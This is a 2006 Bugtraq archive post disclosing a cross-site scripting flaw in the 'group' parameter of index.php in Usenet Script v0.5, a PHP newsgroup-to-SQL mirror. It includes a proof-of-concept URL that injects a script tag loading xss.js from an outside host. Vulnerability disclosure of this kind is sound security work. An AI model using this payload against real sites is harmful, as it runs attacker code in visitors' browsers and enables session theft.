Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Usenet Script v0.5

From: luny () youfucktard com
Date: 25 Jun 2006 17:18:22 -0000
Usenet Script v0.5

Homepage:
http://www.metalhead.ws/usenet

Description:

"Those scripts allow you to mirror a Newsgroup in an SQL database. The development database was Postgresql, but it uses 
dbx and should therefore be able to work with other database systems, too. Furthermore, a frontend is provided."

Affected files:

index.php

------------------------------------
XSS vuln via index.php on group var:

Data isnt properly sanatized before being generated. 
http://www.example.com/index.php?group=<script src=http://www.youfucktard.com/xss.js></script>
Previous By Date Next
Previous By Thread Next

Current thread: